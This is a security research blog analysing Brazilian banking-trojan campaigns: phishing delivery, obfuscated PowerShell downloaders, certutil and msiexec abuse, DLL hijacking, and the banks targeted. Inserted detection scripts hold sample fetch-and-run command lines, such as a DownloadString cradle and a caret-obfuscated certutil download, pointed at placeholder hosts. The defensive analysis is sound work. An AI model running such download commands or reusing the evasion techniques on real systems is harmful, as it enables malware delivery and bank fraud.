Research by: Assaf Dahan and Joakim Kandefelt
For more than a decade, Brazil has been considered a major contributor to global cybercrime. Countless security reports have detailed a plethora of nefarious activities linked to Brazilian threat actors, who mainly target the financial and private sector. Brazil is particularly known for being home to huge botnets that send out spam and phishing emails and proliferate infostealers and banking Trojans. After India and China, Brazil is the world's third most botnet-infected country, according to The Spamhaus Project.
In 2018, Cybereason’s Nocturnus team analyzed numerous campaigns related to several families of Brazilian financial malware. This blog shows the pervasiveness of this Brazilian-made malware, which targets online banking customers of over 60 banks in nearly a dozen countries throughout Latin America, Spain and Portugal. It continues research presented in our earlier blog and maps the evasive infection and delivery methods that Brazilian threat actors use to distribute malware.
The campaigns, which target customers of more than 60 banks worldwide, deliver different kinds of financial malware. Antivirus vendors have assigned this type of malware generic names like: Banload, Banbra, Bancos, Boleto, Delf and Spy.Banker. Despite the variation in the final malware payload, Cybereason identified three key stages that were common to most of the attacks involving Brazilian financial malware.
The multi-stage delivery infrastructure helps attackers to minimize the risk of detection. By implementing various evasive techniques, the attackers successfully bypass signature/heuristic-based engines, thus ensuring the delivery of the final malware. While the multi-stage delivery approach is not new in cybercrime, its adoption by Brazilian threat actors has proven to be highly effective at evading many anti-virus products, as demonstrated by the low detection rate presented in our research.
In each stage, we observed commonalities in the tools, techniques and procedures (TTPs) that are shared across campaigns. These TTPs include:
Our research revealed interesting aspects of the Brazilian malware ecosystem. We observed different types of Brazilian malware being used in conjunction by the same threat actor. On some of the endpoints infected with Brazilian financial malware, we noticed additional Brazilian-made malware, such as infostealers, cryptocurrency miners and a malware that steals data from Microsoft Outlook. This finding gives us a glimpse into the different ways in which threat actors can capitalize on a previously gained foothold in order to increase their potential profits.
Discussing Brazilian financial malware may imply that this threat only targets Brazilian online banking customers, but our research clearly shows that Brazilian threat actors have expanded their operation to Spanish-speaking countries in Latin America and Spain.
Based on the data from recent campaigns, Spain is the second most targeted country after Brazil. Other countries targeted in recent campaigns include Mexico, Argentina, Venezuela, Colombia, Bolivia and Chile.
Our research demonstrates how different types of Brazilian-made malware, originally designed to target Brazilian banking users, were repurposed to target other countries and their respective regional banks. We observed references to more than 60 banks embedded within the malware's code. (See the list of targeted banks in this section).
Cybereason analysts were able to trace the origin of various Brazilian malware to a Remote Access Tool (RAT) whose source code is publicly available on Github. While the identity of the author is known, there is no proof that this author has a direct link to the financial malware discussed in this blog. Cybereason estimates that the publicly available source code was repurposed by different threat actors, who later added the banking modules and anti-analysis features present in the financial malware analyzed in this blog.
Over the course of 2017-2018, Cybereason observed many variations to the infection flow. However, there seems to be a basic formula that most infections adhere to:
Infection Vector: The infection chain starts with a phishing email masquerading as a legitimate business invoice. The email body usually contains either a link or an attachment (pdf, zip, batch script, html) that will fetch or run the first stage downloader.
Stage 1 - Downloader: An obfuscated script or downloader command (.cmd, .lnk, .vbs, .js) is used to download the second stage payload. The downloader often points to a shortened URL that redirects to a Web hosting service, dynamic DNS or CDN to fetch the second stage payload.
Stage 2 - Downloader: Mostly an obfuscated PowerShell script that downloads the main payload. In some cases the second stage downloader has additional functionality, such as creating persistence and performing anti-analysis checks.
Stage 3 - Main Payload: Main malware payload that steals online banking data from the targeted banks found in the malware configuration. The configuration is either embedded in the binary or downloaded from a command-and-control server. Most payloads are Windows executable binaries, developed in Delphi.
During our analysis of these campaigns, Cybereason observed many legitimate services that the threat actors chained together to deliver financial malware. These services include several URL shorteners, Dynamic DNS, online storage services, and CDNs (Brazilian threat actors have been known to use CDNs to deliver malware).
Using these different services together makes the generated network traffic appear legitimate, increasing the chances that it won’t be flagged by IOC/heuristic-based engines. This technique seems to bypass many network security products, antivirus programs and may even evade some security analysts.
Example 1: Multi-stage delivery as observed in network traffic
URL Shortener → Dropbox → URL Shortener → Facebook CDN → Malicious Site/C2 Gate
Example 2: Multi-stage delivery as observed in network traffic
URL Shortener → Dynamic DNS → URL Shortener → Github → Malicious Site/C2 Gate
Table of common services being used as part of the threat actor’s infrastructure
| Service type | Services observed |
| --- | --- |
| URL shorteners | goo.gl, bit.ly, tinyurl.com, bit.do |
| Online storage | dropbox.com, sendspace.com, gitlab.com, github.com, amazonaws.com, 000webhostapp, pastebin.com, googleusercontent.com |
| CDNs | cdn77.org, cdn.fbsbx.com (Facebook’s CDN) |
| Dynamic DNS | publiccloud.com.br, ddns.net, game-server.cc (dyndns), hopto.org, no-ip.org |
Example of first stage payload hosted on Gitlab:
The extracted content is an obfuscated .cmd scriptlet with a very low detection rate:
Cybereason found that phishing emails were used for the initial infection. The email body usually contains either an attachment or a link to a URL shortener that points to hosting websites where the first stage payload is stored. The payloads often masquerade as Flash/Java updates.
Most emails share a similar subject line and allege to be invoices (“FATURA” in Portuguese). Another common theme is spoofing emails to make them look like they came from VIVO, Brazil’s largest telecommunications company.
Example 1: Spoofed VIVO Emails and Fake Invoices
The infection chain starts after the user opens the PDF attached to the spoofed email:
Examination of the PDF reveals a stream containing a shortened URL:
Once the user clicks anywhere on the PDF, the code will fire a request to the shortened URL, which at the time of the detection had zero antivirus detections:
The URL resolves to the following Dropbox URL, which hosts a ZIP file containing the first stage downloader script:
File name: 2Via-Fatura-13082018.zip
Example 2: .lnk file downloaded from a Web-hosting website
In one recently observed campaign, the victims were led to this file sharing website URL and encouraged to download a ZIP file:
The ZIP file holds a .lnk file (arq1561.lnk) that contains an obfuscated downloader payload:
Once users click on the .lnk file, it spawns cmd.exe and powershell.exe processes, which download a secondary payload:
Additionally, an Internet Explorer instance launches and loads a legitimate Adobe website, probably to allay any suspicions that the users have about the downloaded file and to distract them from what’s going on in the background:
In 70 percent of the infections, the infection chain traces back to three main file extensions: .bat, .cmd and .lnk. The scripts are usually contained in an archive (.rar/.zip) to bypass email and spam filters. In addition to the batch files, we also observed other extensions, such as .exe (Windows Executable) and .chm (compiled HTML), sent over as email attachments.
The combination of downloaders bundled in archives proved to be highly effective at bypassing antivirus products. Many of the analyzed payloads had a low detection rate, ranging from 0 to 17 out of 59 antivirus vendors.
Most of the first stage payloads consisted of an obfuscated script or a set of obfuscated commands. The batch script below uses an obfuscation that gradually builds up its payload, as detailed in this blog. The PowerShell payload is set as an Environment Variable (in this case the variable is called “system”):
This obfuscation type appears to be adopted from Daniel Bohannon’s Invoke-Obfuscation project. Once PowerShell is executed, the actual downloader payload does not appear in the process’ command-line arguments:
PowerShell command-line arguments: -nop -win 1 -
However, by examining the environment variables at runtime, one can observe the downloader command set to the “system” environment variable:
Based on our observations, this technique is widely used by Brazilian threat actors. It is yet another sign of the effort the threat actors put into evading both static detection (through obfuscation) and detection based on command-line logging (by parking the payload in an environment variable).
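The pattern above (PowerShell started with `-nop -win 1 -`, script piped over stdin, cradle stored in an environment variable) is what a process-level detection should key on. The following is an added example, not Cybereason's or the malware's code; the process events are constructed and the cradle string is an invented placeholder.

```python
"""Spot PowerShell launches whose payload lives in an environment variable
while the script itself is read from stdin ("-nop -win 1 -"), so that
command-line logging alone never records the download cradle.

Added example for this post, not Cybereason's or the malware's code. The
process events are constructed; the cradle string is an invented placeholder."""
import re
from typing import Dict, List, Optional

# Markers that a download cradle usually carries, matched case-insensitively.
CRADLE_RE = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-expression|\biex\b"
    r"|invoke-webrequest|start-bitstransfer|frombase64string",
    re.IGNORECASE,
)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def is_powershell(image_path: str) -> bool:
    return image_path.replace('"', "").rsplit("\\", 1)[-1].lower() in POWERSHELL_IMAGES


def reads_script_from_stdin(cmdline: str) -> bool:
    """A trailing bare '-' tells powershell.exe to read the script from
    stdin, so whatever the batch file piped in never reaches the cmdline."""
    parts = cmdline.split()
    return len(parts) >= 2 and parts[-1] == "-"


def analyze(event: Dict) -> Optional[Dict]:
    """Return a finding for a PowerShell process event, or None if clean.
    'event' carries image, cmdline and the process environment block."""
    if not is_powershell(event["image"]):
        return None
    findings: List[str] = []
    if reads_script_from_stdin(event["cmdline"]):
        findings.append("script-from-stdin")
    for name, value in event["env"].items():
        if CRADLE_RE.search(value):
            findings.append(f"cradle-in-env:{name}")
    if not findings:
        return None
    # stdin script plus a cradle parked in the environment is the post's
    # exact hiding pattern; either signal alone is only worth a look.
    severity = "high" if len(findings) >= 2 else "low"
    return {"pid": event["pid"], "severity": severity, "findings": findings}


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {   # constructed: the batch-built cradle parked in %system%, script over stdin
        "pid": 4120, "parent": "cmd.exe", "image": PS_IMAGE,
        "cmdline": "powershell.exe -nop -win 1 -",
        "env": {"system": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.txt')",
                "PATH": r"C:\Windows\System32"},
    },
    {   # constructed: stdin script but nothing suspicious in the environment
        "pid": 4121, "parent": "cmd.exe", "image": PS_IMAGE,
        "cmdline": "powershell.exe -",
        "env": {"PATH": r"C:\Windows\System32"},
    },
    {   # constructed: ordinary interactive launch
        "pid": 4122, "parent": "explorer.exe", "image": PS_IMAGE,
        "cmdline": "powershell.exe -NoProfile -Command Get-Date",
        "env": {"PATH": r"C:\Windows\System32", "USERNAME": "alice"},
    },
]


def scan(events: List[Dict]) -> List[Dict]:
    """Run analyze() over a batch of events and keep only the hits."""
    return [r for r in (analyze(e) for e in events) if r is not None]


if __name__ == "__main__":
    for result in scan(SAMPLE_EVENTS):
        print(result)
```

The environment block is what an EDR or Sysmon-style sensor has to capture for this to work; command-line logging by itself only ever shows the harmless-looking `-nop -win 1 -`.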
The Brazilian threat actors seem keenly aware of the trend of using Microsoft-signed and trusted binaries (aka LOLBins) to download or execute payloads. In addition to the commonly seen PowerShell and Windows script engines, we observed other Microsoft binaries being used across different campaigns.
Example #1: Using msiexec.exe as a Downloader
The above .lnk file spoofs an Internet Explorer shortcut. Once executed, a secondary payload is downloaded, extracted and executed using Microsoft’s msiexec.exe:
The shortened URL resolves to the following URL (FaceBook's CDN):
The downloaded payload is an MSI package, which serves as a container that deploys “windows.bat” into %appdata%:
Contents of the batch file:
The deobfuscated payload is the following PowerShell downloader command stored in an environment variable (“day”):
This downloader fetches another PowerShell payload, which ultimately drops the main payload.
Example #2: Using Certutil as a Downloader
The above RAR archive contains a .lnk file, which upon execution will download a payload using Microsoft’s Certutil.exe with the “-URLCache” and “-f” flags:
The executed command will download and launch a batch file (secondary downloader):
Example #3: Using Certutil to base64 Payloads
We observed a .lnk file that included the following command, which uses Microsoft’s Certutil to decode a base64 payload:
The decoded payload is further obfuscated with simple caret obfuscation (^):
The deobfuscated command downloads a secondary payload:
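Caret obfuscation defeats naive string matching on raw command lines, so a detection for the three LOLBin patterns in this section (msiexec fetching a package from a URL, certutil with -urlcache, certutil -decode) has to normalize the line first. The block below is an added example, not Cybereason's or the malware's code; the sample command lines are constructed with placeholder hosts.

```python
"""Normalize cmd.exe caret obfuscation, then flag the LOLBin download and
decode patterns this post describes (msiexec from a URL, certutil -urlcache,
certutil -decode).

Added example, not Cybereason's or the malware's code. Sample command lines
are constructed; example.invalid is a placeholder host."""
import re
from typing import List, Tuple


def strip_cmd_carets(line: str) -> str:
    """Undo cmd.exe caret escaping. Outside double quotes '^' escapes the
    next character (so '^^' is a literal caret); inside quotes it is literal.
    A lone trailing caret is a line continuation and is simply dropped."""
    out: List[str] = []
    in_quote = False
    i = 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            in_quote = not in_quote
            out.append(ch)
        elif ch == "^" and not in_quote:
            if i + 1 < len(line):
                out.append(line[i + 1])
                i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


URL = r"https?://\S+"
# Each rule is matched against the de-carated line, case-insensitively.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # -f only forces overwrite, so -urlcache plus a URL is the real signal
    ("certutil-urlcache-download", re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*" + URL, re.I)),
    ("certutil-base64-decode", re.compile(r"\bcertutil(?:\.exe)?\b.*-decode\b", re.I)),
    ("msiexec-remote-package", re.compile(r"\bmsiexec(?:\.exe)?\b.*(?:/|-)i\s+" + URL, re.I)),
]


def classify(cmdline: str) -> List[str]:
    """Return the rule names that fire for one command line, plus
    'caret-obfuscated' when a hit only appeared after normalization."""
    normalized = strip_cmd_carets(cmdline)
    hits = [name for name, rx in RULES if rx.search(normalized)]
    if hits and normalized != cmdline:
        hits.append("caret-obfuscated")
    return hits


SAMPLE_CMDLINES = [
    # constructed: caret-split certutil download (the Example #2 pattern)
    r"c^e^r^t^u^t^i^l -url^cache -f htt^p://example.invalid/a/upd.txt %temp%\upd.bat",
    # constructed: certutil used as a base64 decoder (the Example #3 pattern)
    r"certutil -decode %temp%\blob.txt %temp%\stage.cmd",
    # constructed: msiexec pulling a package straight from a URL (the Example #1 pattern)
    r"msiexec /i http://example.invalid/pkg/upd.msi",
    # constructed: benign uses that must not fire
    r'certutil -verify "C:\temp\site.cer"',
    r"msiexec /i C:\installers\app.msi /qn",
]


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(classify(line) or "clean", "<-", strip_cmd_carets(line))
```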
Our investigation showed variation in the types of second stage downloaders across different campaigns. The main purpose of the second stage downloaders is to fetch an additional payload, in many cases the main payload. Some secondary downloaders showed additional capabilities, such as persistence creation, UAC bypass and anti-research checks.
Example #1: Persistence and fetching secondary payload
The following second stage downloader is a PowerShell script that checks for an existing infection, drops a batch file that checks for values in the registry, drops a .lnk file that points to the aforementioned batch file for persistence and fetches a secondary XOR-encrypted payload from the same remote server. The script has a low detection rate (3/54):
Initially, the script checks for a likely previous infection by searching for a file name with the day’s date (in the form of yyyymmdd) in the %temp% directory and, if this file is unavailable, it downloads a bitwise XOR-encrypted payload:
The full batch file script is built dynamically by the PowerShell script. Here we see it being built with environment variables as seen in other instances throughout the different campaigns.
The .lnk file is created via Windows Script Host (commonly referred to as Wscript) and is used for persistence, as it will point to the batch file when executed (the $cmdFileName variable contains the path to the batch file):
The script uses a scheduled task to bypass UAC (User Account Control). The created batch file is executed once, and then the task is deleted to remove as much evidence as possible:
Contents of batch file:
Example #2: Obfuscated Downloader with Anti-Virtual Machine Checks
While analyzing an incident, we found the following PowerShell script, which looked different from the previous downloader. The script was likely obfuscated by the ISESteroids PowerShell extension, which provides a built-in obfuscation feature. The script had a particularly low detection rate (2/57):
Once deobfuscated, the script turns out to perform a few anti-virtual-machine checks. These checks are part of the threat actors’ evasion techniques and attempt to prevent researchers from studying the main payload. As seen below, the script uses WMI to query for these virtualization products: VirtualBox, VMware Virtual Platform, Virtual Machine, HVM DOMU:
Once the “coast is clear”, the script will create persistence via a .lnk file, which will execute the malware via Rundll32.exe.
The campaign’s main payloads consisted mostly of common Brazilian malware that antivirus vendors generically name Banload, Banbra, Bancos, Boleto, Delf and Spy/Banker. Brazilian financial malware is known for its effectiveness in overcoming multi factor authentication (MFA), by implementing sophisticated social-engineering tricks to extract SMS codes and other security tokens information, using overlay screens as previously shown.
Cybereason identified variations in the way that the main payloads were executed. In this part, we will examine executions that involve abuse of trusted third-party applications via DLL hijacking as well as using built-in Microsoft-signed binaries (also known as “LOLBins”) to execute the malware code. Using these techniques lowers the risk of detection.
As discussed in an earlier blog, the Brazilian threat actors seem quite fond of leveraging DLL-hijacking techniques against trusted security vendors, including Avira and McAfee, and trusted technology companies like VMware, NVIDIA, HP, Realtek and Adobe.
We noticed that the Brazilian threat actors evolved how they implemented DLL-hijacking. Earlier infections that used this technique implemented a classic approach of deploying a vulnerable trusted binary along with a fake DLL. This TTP was previously documented being used in the context of Brazilian financial malware. In some cases, the fake DLL was even signed with revoked or self-signed certificates in an attempt to further lower the possibility of detection.
Newer samples observed in 2017 and 2018 added another layer of evasion by splitting the malware payload into two components:
This codependency between the loader and the encrypted payload makes the detection and analysis of this malware harder. For the malware to run, it requires that both files reside in the same folder. In most cases, the loader DLL will also validate that it is running in the context of the vulnerable application, or else it will crash.
Example #1: Remote Overlay RAT Abusing Avira via DLL Hijacking
An email attachment sent to a user contained a .lnk file, which executed the following commands that led to a download of a binary (reymr.exe):
The binary is a signed Avira product renamed by the attackers, as indicated by the file metadata. See this VirusTotal link for more information:
Further investigation showed that along with reymr.exe, the PowerShell script also dropped the following files:
| File | Description | SHA-1 |
| --- | --- | --- |
| reymr.exe | Legitimate Avira.SystrayStartTrigger signed binary | 762BF93E6265B4E74BD0BFCAA447F1A619DB2F58 |
| msvcr120.dll | Legitimate Microsoft® C Runtime Library | F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1 |
| msvcp120.dll | Legitimate Microsoft® C Runtime Library | EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613 |
| avira.oe.nativecore.dll | Malicious DLL exploiting Windows search order hijacking to execute malware. Decrypts the contents of RestartManagerUninstall.mui | 312F4DC26FD0C277F9727CE3B943123CBEB127C1 |
| RestartManagerUninstall.mui | Encoded blob loaded after avira.oe.nativecore.dll with Trojan functionality | 9A944B0933F004DB012DB202BF5C2BE1E231FBB5 |
Reymr.exe includes avira.oe.nativecore.dll in its import table:
The main payload was identified as the Remote Overlay RAT, previously discussed here.
In some recent spam campaigns that we monitored, the malware authors favored the built-in Rundll32.exe to launch the loader DLL payload. Once the DLL is executed, it will load and decrypt a second (sometimes even a third) encrypted binary, which is the malware main payload.
Example #1: Financial Trojan launched by Rundll32
In this example, we can see a PowerShell process that was spawned by cmd.exe as a result of a .lnk file execution. PowerShell downloads a secondary payload from a malicious website:
Download URL: hxxp://barca21[.]zapto[.]org/barca21/vx1.txt
The PowerShell payload drops and extracts a ZIP file containing the following files:
| File | Description | SHA-1 |
| --- | --- | --- |
| Yaew.toib | Loader binary (DLL) | 3F9E9BD8330660B0DA23EE8D54787A44E53DDF65 |
| Yaew1.toib | Encrypted financial Trojan payload (DLL). Exported function: OCSVFWBO56 | 87DBACFE8727B9DA1EACE101BEE84D06388FA7B6 |
| G | Encryption & configuration data | D5E3969BB36A675CF9CE60A88ABB5C8DE7C3BD80 |
"C:\Windows\System32\rundll32.exe" C:\Users\Public\YAEW.TOIB ,,, OCSVFWBO56
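Several things in this rundll32 line are worth alerting on: the module has a made-up extension (.TOIB), it lives in a world-writable folder, the entry point is separated by a run of commas, and the parent is a script host. The block below is an added example, not Cybereason's or the malware's code; it reuses the command line quoted above, while the other two events are constructed (the AppData path for the Example #2 loader is invented).

```python
"""Assess rundll32 launches the way a detection rule would: read the module
and entry point as rundll32 itself does, then score the oddities the post
shows (fake extension, user-writable drop path, comma padding before the
export, script-host parent).

Added example for this post, not Cybereason's or the malware's code. The
first command line is the one quoted in the post; the others are constructed."""
import re
from typing import Dict, List, Optional

LOADABLE_EXTENSIONS = {"dll", "cpl", "ocx", "ax"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(
    r"\\(?:users\\public|users\\[^\\]+\\appdata|programdata|windows\\temp)\\", re.IGNORECASE
)


def parse_rundll32(cmdline: str) -> Dict:
    """Split a rundll32 command line into module and entry point.
    Assumed parsing rule (consistent with the post's ',,,' example): the
    module runs to the first comma or space unless quoted, then any run of
    commas and spaces is skipped before the entry-point token."""
    rest = cmdline.strip()
    if rest.startswith('"'):                       # quoted rundll32 image
        rest = rest[rest.index('"', 1) + 1:]
    else:
        rest = rest.split(None, 1)[1] if " " in rest else ""
    rest = rest.lstrip()
    if rest.startswith('"'):
        end = rest.index('"', 1)
        module, rest = rest[1:end], rest[end + 1:]
    else:
        match = re.match(r"[^,\s]+", rest)
        module = match.group(0) if match else ""
        rest = rest[len(module):]
    stripped = rest.lstrip(", \t")
    separator = rest[: len(rest) - len(stripped)]
    entry = stripped.split()[0] if stripped else ""
    return {"module": module, "entry": entry, "comma_padding": separator.count(",") > 1}


def assess(event: Dict) -> Optional[Dict]:
    """Return reasons and severity for one rundll32 process event, or None."""
    info = parse_rundll32(event["cmdline"])
    filename = info["module"].rsplit("\\", 1)[-1]
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    reasons: List[str] = []
    if ext not in LOADABLE_EXTENSIONS:
        reasons.append(f"non-standard-extension:{ext or 'none'}")
    if USER_WRITABLE.search(info["module"]):
        reasons.append("user-writable-module-path")
    if info["comma_padding"]:
        reasons.append("comma-padded-entry")
    parent = event.get("parent", "").lower()
    if parent in SCRIPT_HOSTS:
        reasons.append(f"script-host-parent:{parent}")
    if not reasons:
        return None
    severity = "high" if len(reasons) >= 2 else "low"
    return {"pid": event["pid"], "module": info["module"], "entry": info["entry"],
            "severity": severity, "reasons": reasons}


SAMPLE_EVENTS = [
    {   # the post's rundll32 line: fake extension, public folder, ',,,' padding
        "pid": 5200, "parent": "powershell.exe",
        "cmdline": r'"C:\Windows\System32\rundll32.exe" C:\Users\Public\YAEW.TOIB ,,, OCSVFWBO56'},
    {   # constructed: the post's Example #2 loader and export under an invented AppData path
        "pid": 5201, "parent": "powershell.exe",
        "cmdline": r"rundll32.exe C:\Users\alice\AppData\Roaming\OAzBrxSXRoTOBssa.dll,dGuCCzlxnosaJBpk"},
    {   # constructed: a routine Control Panel launch that must stay quiet
        "pid": 5202, "parent": "explorer.exe",
        "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["pid"], assess(ev) or "clean")
```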
The unpacked payload seems to be a variant of a Brazilian Remote Overlay RAT:
Example #2: Rundll32 injecting Main Payload to Windows Media Player
In this example, we will follow the execution starting from the second stage PowerShell downloader:
The network PCAP shows a second stage PowerShell that downloads a ZIP file (PK signature):
The zip file contains OAzBrxSXRoTOBssa.dll and OAzBrxSXRoTOBssa.
List of dropped files:
| File | Description | SHA-1 |
| --- | --- | --- |
| 1010180844353.bmp | Zip (dropped by PowerShell) | 3344EF3B32DF03057721ED6E76F276B9073A0932 |
| OAzBrxSXRoTOBssa.dll | Malware loader; exported function: dGuCCzlxnosaJBpk | C523C65C7BD9EE09360C24BC706985BA5361D724 |
The PowerShell script extracts its contents and runs the DLL via rundll32.exe, pointing to the exported function “dGuCCzlxnosaJBpk”:
Once the loader decrypts the main payload (OAzBrxSXRoTOBssa), it injects the malicious code into Windows Media Player:
The injected PE (MZP header) is mapped into the memory space of Windows Media Player:
The dumped payload shows indications that the malware was likely compiled on a machine with Brazilian Portuguese language settings, as can be found in the RC_DATA resource section:
Once executed, the malware sends an initial beacon via a POST request to the command-and-control server:
Other Brazilian malware that was related to the malware we analyzed was also found on the compromised machines. These post-infection payloads provide a glimpse into the Brazilian malware ecosystem and, to some extent, offer an understanding of what the threat actors are after.
In addition to the banking Trojans, we found that the same campaigns were distributing cryptocurrency miners, infostealers and malware that targets Microsoft Outlook. Malware that targets Outlook is a particular concern since it poses a major risk to organizations worldwide. The malware contains features that leverage Outlook’s functions, like the ability to query victims’ contact lists. Threat actors usually use this information for spam campaigns, but can also sell it on the dark market to other attackers who want information on an organization they’re planning to attack.
The following is an example of malware designed to steal credentials using overlay phishing and to download additional malware. The malware and its auxiliary components were found in %programdata%:
| File | Description | SHA-1 |
| --- | --- | --- |
| Rltkapo32.exe | Renamed authentic Microsoft Certmgr.exe | F18EEBAEA4460B057F5B49E8239779F1C0C05BB9 |
| Cryptui.dll | Fake DLL, serves as a loader and injector | D3AE2843261528D8B4A5D6070661FE302E7A1FA9 |
| Borlndmm.dll | Legitimate Delphi Borland Library | 76E3A2004E5BA7F5126FAC9922336F38E928D733 |
As seen before, Brazilian threat actors often exploit DLL hijacking, and this time the vulnerable application was Windows’ “certmgr.exe” (aka, Certificate Manager Tool). The fake DLL (cryptui.dll) loaded and injected to svchost.exe the main malware payload (Rltkapo32.driver):
Examination of the payload injected into svchost shows that the Delphi malware presents a fake login form to its victims in order to steal their credentials (possibly even organizational credentials):
The injected svchost process communicates with the C2 servers and downloads a second payload:
Mathilde.exe, SHA-1: 15166EF05CB3278E388C46359835A64CFB4D29EC
Mathilde.exe is an SFX file which extracts a script called “linsoldo.cmd”, which is a PowerShell downloader:
The script fetches an Outlook stealer PowerShell script hosted on an Amazon S3 bucket.
The downloaded PowerShell script (“Outpos.data”) is designed to steal information from Microsoft Outlook clients and harvest users’ email addresses. Its main capabilities:
Excerpt from the PowerShell script shows the exfiltration data:
The comments in Portuguese left by the malware’s author are also worth noting:
The data is posted to a server (18.104.22.168) running XAMPP. Its error page exposes an admin panel referencing the name “coringa”, as can be seen below:
“Coringa” is likely a reference to a Brazilian RAT called “Coringa-RAT”, whose source code is publicly available. It is likely that the threat actors are using the RAT in other campaigns as well. Cybereason, however, did not observe a direct use of Coringa-RAT in the aforementioned campaigns.
The URL from which the Outlook malware was downloaded points to an Amazon S3 Bucket:
The bucket contains several kinds of Brazilian malware, such as: second stage downloaders, Outlook mail stealer and also a Brazilian banking trojan (Remote Overlay RAT):
| File | Description | SHA-1 |
| --- | --- | --- |
| outpos.data | Outlook mail stealer (PowerShell script) | 0657FAA51EB8417A2D63388A9BA37997A2B5F323 |
| image2.png | Zip file containing a vulnerable NVIDIA binary and Brazilian financial malware | |
| Poratal.txt / Testefad.txt | PowerShell downloader | E138609B66FC6B9C6C688DE6B5DC094A782C6474 |
The unpacked payload of the Remote Overlay RAT shows that the malware targets Brazilian banks such as: CitiBank Brasil, Safra National Bank, Banco da Amazonia, Itau Brasil and Bradesco:
Cybereason analyzed multiple infections involving different Brazilian financial malware that did not target Brazilian bank users. Instead, the malware configuration was set to target bank users in Latin America and Spain. This finding is consistent with earlier research papers that discuss various aspects of the role of Brazilian cybercrime in the global threat landscape and its proliferation to various regions. Research from ESET, TrendMicro, Kaspersky and ElevenPaths has more details on that topic.
The following examples, taken from infections that occurred in 2018, show that online bank users in Spanish-speaking countries are also being targeted. These countries include Argentina, Bolivia, Chile, Venezuela and Spain. Cybereason found earlier samples of Brazilian malware targeting more countries, such as Mexico, Portugal, Colombia and other Latin American countries.
Example #1: Brazilian Financial Malware targeting bank customers in Latin America and Spain
Example #2: Brazilian Spammer / Info-Stealer targeting Venezuela & Bolivia
Bancaribe, Banco Fondo Común (BFC), Banco Exterior, Banco Sofitasa, BBVA Provincial, Banco Universal, Banco Industrial de Venezuela, Banesco Banco Universal, Banco Caroní, Banco Venezolano de Crédito, Banco Nacional de Crédito, El Banco Federal
Example #3: Brazilian Banker Targeting Argentinian Users
Extracted image from the malware resource, shows an overlay screen meant to bypass Multi-Factor Authentication, targeting customers of Bank of Patagonia:
List of Argentinian banks targeted by the Brazilian malware:
Banco Patagonia, Itaú Argentina, Standard Bank Argentina, Banco Macro, Industrial and Commercial Bank of China (Argentina), Santander Rio
During our investigation, it was evident that the different malware types were created by Portuguese-speaking authors and were originally designed to target Brazilian users. This is supported by the embedded Portuguese strings and references to specific security software that belongs to Brazilian banks, as can be seen below:
Command & Control instructions in Portuguese:
List of commands embedded in the malware’s code shows Portuguese strings:
Excerpt from UAC-bypass procedure used by the malware (“not possible to verify UAC”):
Strings referencing specific software distributed by Brazilian banks to enhance online banking safety, such as: G-buster Plugin (GbPlugin), Aplicativo Bradesco and Aplicativo Itau.
Based on the functionality and string similarity, Cybereason estimates that different kinds of Brazilian malware borrowed code from, or were even based on, the source code of a Remote Access Tool (RAT) called “Delphi Remote Access PC”. The RAT is open source and publicly available on Github. It was coded in 2015 by a Brazilian user whose Internet handle is “senjaxus”. This user also co-coded another RAT called AllaKore. The author clearly states that he is not responsible for any misuse of his code:
“This source was created by Richard Maickonn. Distribution of this source is free! Contact: senjaxus[at]gmail.com.
I AM NOT RESPONSIBLE FOR THE MISUSE OF THIS SOURCE.”
Even though the code has fully functional remote access capabilities, it does not seem to contain functionality directly related to financial malware, namely targeting of banks or screen-overlay social engineering. In addition, unlike typical Brazilian financial malware, the Github source code does not contain anti-analysis code, such as the ability to detect virtual machines, security products or Brazilian banking software. It is our estimation that these features were likely added by different malware authors who repurposed the open-source RAT code.
Examples of code similarity between the Github source code and other Brazilian malware payloads:
Example #2: Brazilian malware targeting Chilean Bank Users
Example #3: MPRado Remote Access Tool
This RAT seems heavily based on the source code of Delphi Remote Access PC. This is likely a variant of the RAT:
In this blog, we surveyed the techniques used by Brazilian threat actors as observed by Cybereason throughout 2017-2018. We also showed how different financial malware campaigns share similar traits around delivery methods. The analysis of the tools and techniques highlights how effective these methods are at evading antivirus products, as demonstrated repeatedly by the low detection rate. In addition, we showed how Brazilian threat actors are expanding their campaigns and targeting online banking users across Latin American countries as well as Spain. Finally, we linked several payloads to an open-source RAT that was created by a Brazilian author whose code was likely repurposed and turned into various banking trojans by Brazilian threat actors.